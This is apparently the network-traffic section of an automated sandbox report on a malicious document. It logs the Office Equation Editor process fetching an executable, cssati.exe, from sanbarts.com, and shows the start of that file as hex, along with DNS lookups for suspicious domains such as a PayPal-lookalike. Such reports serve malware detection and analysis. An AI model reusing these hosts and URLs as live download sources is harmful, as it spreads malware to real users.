                                                        May 27, 2022 21:20:09.580612898 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.605880976 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.605914116 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.605964899 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.605992079 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.627268076 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.627300024 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.627317905 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.627335072 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.627352953 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.627368927 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.627443075 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.629139900 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.642915964 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.642956018 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.642973900 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.642992973 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.643028975 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.643062115 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.096009970 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.096046925 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.096069098 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.096086979 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.096103907 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.096121073 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.096138000 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.096155882 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.096172094 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.096184015 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.096200943 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.096218109 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.096234083 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.096240044 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.096251965 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.096263885 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.096267939 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.096271038 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.096271038 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.096273899 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.096276999 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.096288919 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.096292019 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.096307039 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.096307993 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.096322060 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.096345901 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.098190069 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.189691067 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.189721107 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.189739943 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.189802885 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.189841032 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.205245018 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.205271959 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.205288887 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.205305099 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.205324888 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.205337048 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.205439091 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.205450058 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.205470085 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.205496073 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.205517054 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.236854076 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.236876011 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.236893892 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.236911058 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.236927986 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.236946106 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.236963034 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.236980915 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.236980915 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.236998081 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.237000942 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.237010956 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.237015009 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.237035990 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.237059116 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.237435102 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.283444881 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.283473015 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.283490896 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.283507109 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.283524990 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.283585072 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.285192013 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.314755917 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.314793110 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.314810991 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.314824104 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.314840078 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.314857960 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.314874887 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.314960003 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.317132950 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.689707994 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.689747095 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.689765930 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.689788103 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.689805031 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.689822912 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.689840078 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.689857006 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.689930916 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.691651106 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.691672087 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.729345083 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.729373932 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.729392052 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.729413986 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.729419947 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.729437113 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.729439020 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.729446888 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.729460001 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.729480982 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.729481936 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.729506016 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.729521990 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.729523897 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.729536057 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.729547977 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.729569912 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.731208086 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.767855883 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.767889023 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.767911911 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.767935038 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.767946005 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.767956018 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.767976046 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.767997980 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.767998934 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768008947 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768017054 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768022060 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768024921 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768029928 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768035889 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768044949 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768066883 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768079996 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768088102 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768090963 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768107891 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768114090 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768120050 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768135071 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768151999 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768172979 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768178940 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768196106 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768214941 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768223047 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768224955 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768229961 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768237114 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768245935 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768269062 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768279076 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768292904 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768294096 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768310070 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768315077 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768332005 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768338919 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768349886 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768358946 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768379927 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768388033 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768399954 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768409967 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768415928 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768430948 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768452883 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768452883 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768466949 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768474102 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768512011 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768516064 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768526077 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768533945 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768546104 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768557072 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768573046 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768578053 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768598080 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768599987 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768609047 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768621922 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768640995 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768641949 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768662930 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768682957 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768686056 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768699884 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768707991 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768724918 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768732071 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768739939 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768752098 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768774033 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768776894 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768789053 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768794060 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768810987 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768815041 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768836975 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768840075 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768851995 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768861055 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768878937 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768884897 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768903971 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768919945 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.769145012 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:13.816498995 CEST4917380192.168.2.22194.9.94.86
                                                        May 27, 2022 21:20:13.816508055 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:21:49.167212963 CEST4917580192.168.2.2298.137.244.37
                                                        May 27, 2022 21:21:49.331017971 CEST804917598.137.244.37192.168.2.22
                                                        May 27, 2022 21:21:49.331130028 CEST4917580192.168.2.2298.137.244.37
                                                        May 27, 2022 21:21:49.331468105 CEST4917580192.168.2.2298.137.244.37
                                                        May 27, 2022 21:21:49.495305061 CEST804917598.137.244.37192.168.2.22
                                                        May 27, 2022 21:21:49.504925966 CEST804917598.137.244.37192.168.2.22
                                                        May 27, 2022 21:21:49.504951954 CEST804917598.137.244.37192.168.2.22
                                                        May 27, 2022 21:21:49.505060911 CEST4917580192.168.2.2298.137.244.37
                                                        May 27, 2022 21:21:49.505135059 CEST4917580192.168.2.2298.137.244.37
                                                        May 27, 2022 21:21:49.514435053 CEST804917598.137.244.37192.168.2.22
                                                        May 27, 2022 21:21:49.514493942 CEST4917580192.168.2.2298.137.244.37
                                                        May 27, 2022 21:21:49.668987989 CEST804917598.137.244.37192.168.2.22

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        May 27, 2022 21:20:07.500580072 CEST5586853192.168.2.228.8.8.8
                                                        May 27, 2022 21:20:07.519690990 CEST53558688.8.8.8192.168.2.22
                                                        May 27, 2022 21:20:07.697839022 CEST4968853192.168.2.228.8.8.8
                                                        May 27, 2022 21:20:07.747270107 CEST53496888.8.8.8192.168.2.22
                                                        May 27, 2022 21:21:30.526065111 CEST5883653192.168.2.228.8.8.8
                                                        May 27, 2022 21:21:30.566380978 CEST53588368.8.8.8192.168.2.22
                                                        May 27, 2022 21:21:48.877341032 CEST5013453192.168.2.228.8.8.8
                                                        May 27, 2022 21:21:49.139980078 CEST53501348.8.8.8192.168.2.22
                                                        May 27, 2022 21:22:09.726602077 CEST5527553192.168.2.228.8.8.8
                                                        May 27, 2022 21:22:09.749313116 CEST53552758.8.8.8192.168.2.22

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                        May 27, 2022 21:20:07.500580072 CEST192.168.2.228.8.8.80xcd9Standard query (0)sanbarts.comA (IP address)IN (0x0001)
                                                        May 27, 2022 21:20:07.697839022 CEST192.168.2.228.8.8.80xf72Standard query (0)www.sanbarts.comA (IP address)IN (0x0001)
                                                        May 27, 2022 21:21:30.526065111 CEST192.168.2.228.8.8.80xc4a9Standard query (0)www.storyofsol.comA (IP address)IN (0x0001)
                                                        May 27, 2022 21:21:48.877341032 CEST192.168.2.228.8.8.80x1666Standard query (0)www.createacarepack.comA (IP address)IN (0x0001)
                                                        May 27, 2022 21:22:09.726602077 CEST192.168.2.228.8.8.80x723cStandard query (0)www.paypal-caseid521.comA (IP address)IN (0x0001)

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                        May 27, 2022 21:20:07.519690990 CEST8.8.8.8192.168.2.220xcd9No error (0)sanbarts.com194.9.94.86A (IP address)IN (0x0001)
                                                        May 27, 2022 21:20:07.519690990 CEST8.8.8.8192.168.2.220xcd9No error (0)sanbarts.com194.9.94.85A (IP address)IN (0x0001)
                                                        May 27, 2022 21:20:07.747270107 CEST8.8.8.8192.168.2.220xf72No error (0)www.sanbarts.com215ffbc1941f6023.7host.cnCNAME (Canonical name)IN (0x0001)
                                                        May 27, 2022 21:20:07.747270107 CEST8.8.8.8192.168.2.220xf72No error (0)215ffbc1941f6023.7host.cn45.120.185.113A (IP address)IN (0x0001)
                                                        May 27, 2022 21:21:30.566380978 CEST8.8.8.8192.168.2.220xc4a9Name error (3)www.storyofsol.comnonenoneA (IP address)IN (0x0001)
                                                        May 27, 2022 21:21:49.139980078 CEST8.8.8.8192.168.2.220x1666No error (0)www.createacarepack.comsbsfe-p8.geo.mf0.yahoodns.netCNAME (Canonical name)IN (0x0001)
                                                        May 27, 2022 21:21:49.139980078 CEST8.8.8.8192.168.2.220x1666No error (0)sbsfe-p8.geo.mf0.yahoodns.net98.137.244.37A (IP address)IN (0x0001)
                                                        May 27, 2022 21:22:09.749313116 CEST8.8.8.8192.168.2.220x723cName error (3)www.paypal-caseid521.comnonenoneA (IP address)IN (0x0001)

                                                        HTTP Request Dependency Graph

                                                        • sanbarts.com
                                                        • www.sanbarts.com
                                                        • www.createacarepack.com

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        0192.168.2.2249173194.9.94.8680C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                        TimestampkBytes transferredDirectionData
                                                        May 27, 2022 21:20:07.586997986 CEST2OUTGET /cssati.exe HTTP/1.1
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                        Host: sanbarts.com
                                                        Connection: Keep-Alive
                                                        May 27, 2022 21:20:07.626665115 CEST2INHTTP/1.1 302 Moved Temporarily
                                                        Server: nginx
                                                        Date: Fri, 27 May 2022 19:20:07 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 138
                                                        Connection: keep-alive
                                                        Location: http://www.sanbarts.com/cssati.exe
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        1192.168.2.224917445.120.185.11380C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                        TimestampkBytes transferredDirectionData
                                                        May 27, 2022 21:20:08.064167976 CEST3OUTGET /cssati.exe HTTP/1.1
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                        Connection: Keep-Alive
                                                        Host: www.sanbarts.com
                                                        May 27, 2022 21:20:08.378580093 CEST4INHTTP/1.1 200 OK
                                                        Content-Type: application/octet-stream
                                                        Last-Modified: Thu, 26 May 2022 00:40:19 GMT
                                                        Accept-Ranges: bytes
                                                        ETag: "4042e42c9970d81:0"
                                                        Server: Microsoft-IIS/10.0
                                                        X-Powered-By: ASP.NET
                                                        Date: Fri, 27 May 2022 19:20:07 GMT
                                                        Content-Length: 299113
                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e5 71 4a a8 a1 10 24 fb a1 10 24 fb a1 10 24 fb 2f 18 7b fb a3 10 24 fb a1 10 25 fb 3b 10 24 fb 22 18 79 fb b0 10 24 fb f5 33 14 fb a8 10 24 fb 66 16 22 fb a0 10 24 fb 52 69 63 68 a1 10 24 fb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 b6 ce 69 46 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5a 00 00 00 d4 01 00 00 04 00 00 fa 32 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 d0 02 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a0 73 00 00 b4 00 00 00 00 c0 02 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 88 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac 59 00 00 00 10 00 00 00 5a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7a 11 00 00 00 70 00 00 00 12 00 00 00 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d8 af 01 00 00 90 00 00 00 04 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 00 09 00 00 00 c0 02 00 00 0a 00 00 00 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 